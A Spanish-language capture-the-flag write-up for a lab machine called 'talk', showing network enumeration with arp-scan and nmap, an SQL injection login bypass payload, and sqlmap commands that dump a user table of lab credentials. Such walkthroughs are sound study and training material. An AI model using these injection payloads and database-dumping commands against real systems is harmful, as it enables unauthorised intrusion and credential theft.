Identificamos la IP de la máquina victima:
❯ arp-scan --interface=wlo1 --localnet | grep PCS
192.168.1.117	08:00:27:70:fd:a1	PCS Systemtechnik GmbH

Enumeramos puertos:
❯ sudo nmap -p- -sS --min-rate 5000 -n -Pn -oG 01-allPorts 192.168.1.117
[sudo] contraseña para wh01s17: 
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00019s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:70:FD:A1 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 0.95 seconds

❯ nmap -sCV -p 22,80 -oN 02-targeted.txt 192.168.1.117
Starting Nmap 7.97 ( https://nmap.org ) at 2025-07-24 12:58 -0400
Nmap scan report for 192.168.1.117
Host is up (0.00036s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 e3:fc:1b:74:e5:e3:c9:ef:6d:ac:df:b1:1e:47:83:ad (RSA)
|   256 10:bd:60:33:a0:d1:a4:7d:de:c8:29:0a:c4:7d:b1:aa (ECDSA)
|_  256 4b:fc:30:a8:12:69:e7:b2:ce:ad:99:f1:66:12:cd:8c (ED25519)
80/tcp open  http    nginx 1.14.2
|_http-title: chatME
|_http-server-header: nginx/1.14.2
| http-cookie-flags: 
|   /: 
|     PHPSESSID: 
|_      httponly flag not set
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.16 seconds


Ingresamos a http://192.168.1.117/ y nos encontramos con un login, el cual es vulnerable a sqli, por lo que nos logueamos con el payload admin' OR 1=1-- -.

Una vez dentro, nos encontramos con un chat, por lo que mandamos un mensaje e interceptamos con burpsuite.

Una vez capturada la request, copiamos el resultado en un archivo con la opción "Copy to file" de burpsuite y analizamos con sqlmap:
❯ sqlmap -r /ruta/absoluta/a/request --threads 10 --dbs
available databases [4]:
[*] chat
[*] information_schema
[*] mysql
[*] performance_schema

❯ sqlmap -r ~/Documentos/maquinas/hmv/01-easy/talk/content/req --threads 10 --tables -D chat 
Database: chat
[3 tables]
+-----------+
| user      |
| chat      |
| chat_room |
+-----------+

❯ sqlmap -r ~/Documentos/maquinas/hmv/01-easy/talk/content/req --dump -D chat -T user
Database: chat
Table: user
[5 entries]
+--------+-----------------+-------------+-----------------+----------+-----------+
| userid | email           | phone       | password        | username | your_name |
+--------+-----------------+-------------+-----------------+----------+-----------+
| 5      | david@david.com | 11          | adrianthebest   | david    | david     |
| 4      | jerry@jerry.com | 111         | thatsmynonapass | jerry    | jerry     |
| 2      | nona@nona.com   | 1111        | myfriendtom     | nona     | nona      |
| 1      | pao@yahoo.com   | 09123123123 | pao             | pao      | PaoPao    |
| 3      | tina@tina.com   | 11111       | davidwhatpass   | tina     | tina      |
+--------+-----------------+-------------+-----------------+----------+-----------+


